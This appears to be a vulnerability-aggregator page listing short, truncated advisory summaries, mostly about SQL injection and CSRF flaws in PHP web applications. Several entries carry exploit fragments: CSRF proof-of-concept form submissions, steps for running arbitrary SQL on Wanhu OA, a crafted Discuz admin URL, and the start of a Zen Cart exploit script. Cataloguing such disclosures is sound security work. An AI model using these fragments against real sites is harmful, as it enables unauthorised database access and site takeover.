SweetRice 1.5.1 - Cross-Site Request Forgery Vulnerability

Exploit for php platform in category web applications document.forms0.submit; 0day.today 2018-01-01...

CVE-2016-8582

A vulnerability exists in gauge.php of AlienVault OSSIM and USM before 5.3.2 that allows an attacker to execute an arbitrary SQL query and retrieve database information or read local system files via MySQL's LOADFILE...

vBulletin forumrunner/includes/moderation.php SQL Injection Vulnerability

VBulletin is a powerful, flexible and fully customizable suite of forum programs. A SQL injection vulnerability exists in the forumrunner/includes/moderation.php file in versions of vBulletin prior to 4.2.2 Patch Level 5 and prior to 4.2.3 Patch Level 1. A remote attacker can exploit this...

miniMySQLAdmin 1.1.3 - Cross-Site Request Forgery (SQL Execution)

miniMySQLAdmin 1.1.3 - Cross-Site Request Forgery SQL Execution document.forms.csrfpoc.submit; select from user order by User asc limit 20 Host User % exploituser1 --...

Symphony CMS SQL Injection Vulnerability

Symphony is a content management system CMS developed using PHP MySQL. Symphony suffers from a SQL injection vulnerability because the program fails to adequately validate the 'fieldsusername', 'actionsave', and 'fieldsemail' parameters can be exploited to execute arbitrary SQL code in the...

Multiple Vulnerabilities in the ERP System of Shenzhen Mingyuan Software Co.

Shenzhen Mingyuan Software Co., Ltd. is a real estate application software and solution provider. There are multiple vulnerabilities in the ERP system of Shenzhen Mingyuan Software Co., Ltd. and by comprehensively exploiting the vulnerabilities, an attacker can obtain website control privileges a...

D-Link DAR-8000/DAR-7000系列上网行为审计网关 任意sql语句执行

No description provided by source...

CmsEasy_5.5_UTF-8_20140118 celive\include\database.class.php 任意sql语句执行漏洞

No description provided by source...

万户OA任意sql语句执行漏洞（标准版）

存在两种利用方式 1. defaultroot/graphreport/runsql.jsp 这个页面可以直接访问，并且可以执行任意sql语句，页面中textarea域是readonly，使用 firebug 去掉即可，然后就可以执行任意 sql 语句。 可以看到成功执行了sql语句 2. 可以直接给处理类提交数据 通过以下这个链接 /defaultroot/GraphReportAction.do?action=showResult 然后通过hackbar来吧以下数据post过去即可看到执行的数据 dataSQL=select...

Discuz! admincp.php CSRF引起XSS

首先是一个CSRF：url：/admincp.php?action=members&operation=newsletter&username=%2A&uid=0&srchemail=&regdatebefore=&regdateafter=&postshigher=&postslower=&regip=&lastip=&lastvisitafter=&lastvisitbefore=&lastpostafter=&lastpostbefore=&birthyear=&birthmonth=&birthday=&lowercredits=&lowerextcredits1=&lowere...

ManageEngine EventLog Analyzer < 10.6 build 10060 - SQL Execution

Exploit Title: ManageEngine EventLog Analyzer SQL query execution Product: ManageEngine EventLog Analyzer Vulnerable Versions: v10.6 build 10060 and previous versions Tested Version: v10.6 build 10060 Windows Advisory Publication: 14/09/2015 Vulnerability Type: authenticated SQL query execution...

[SECURITY] Fedora 19 Update: phpMyAdmin-4.2.12-1.fc19

phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the World Wide Web. Most frequently used operations are supported by the user interface managing databases, tables, fields, relations, index es, users, permissions, while you still have the ability to directly...

Drupal 7.x < 7.32 SQLi

The remote web server is running a version of Drupal that is 7.x prior to 7.32. It is, therefore, potentially affected by a SQL injection vulnerability due to a flaw in the Drupal database abstraction API, which allows a remote attacker to use specially crafted requests that can result in arbitra...

drupal7 -- SQL injection

Drupal Security Team reports: Drupal 7 includes a database abstraction API to ensure that queries executed against the database are sanitized to prevent SQL injection attacks. A vulnerability in this API allows an attacker to send specially crafted requests resulting in arbitrary SQL execution...

PT-2014-6183 · Bmc · Bmc Track-It!

Name of the Vulnerable Software and Affected Versions: BMC Track-It! version 11.3.0.355 Description: The issue allows remote authenticated users to execute arbitrary SQL commands via crafted POST data, specifically targeting the TrackItWeb/Grid/GetData endpoint. Recommendations: For version...

UBUNTU-CVE-2014-5262

SQL injection vulnerability in the graph settings script graphsettings.php in Cacti 0.8.8b and earlier allows remote attackers to execute arbitrary SQL commands via unspecified vectors...

ArticleFR 11.06.2014 (data.php) - Privilege Escalation

Exploit for php platform in category web applications Advisory Details: High-Tech Bridge Security Research Lab discovered vulnerability in ArticleFR, which can be exploited to execute arbitrary UPDATE SQL statements, alter information stored in database and gain complete control over the web site...

Multi Manage DbVisualizer Add Db Admin

Dbvisulaizer offers a command line functionality to execute SQL pre-configured databases With GUI. The remote database can be accessed from the command line without the need to authenticate, which can be abused to create an administrator in the database with the proper database permissions. Note:...

zabbix server Multiple Vulnerabilities

No description provided by source. Zabbix Server : Multiple remote vulnerabilities From: Nicob nicob nicob net Date: Sun, 13 Dec 2009 16:28:35 +0100 From Wikipedia : Zabbix is a network management system application ... designed to monitor and track the status of various network services, servers...

Zen Cart 1.3.8 - Remote SQL Execution Exploit

No description provided by source. !/usr/bin/python ------- Zen Cart 1.3.8 Remote SQL Execution http://www.zen-cart.com/ Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone! A new version 1.3.8a is avaible on http://www.zen-cart.com/ BlackH : Notes: must have...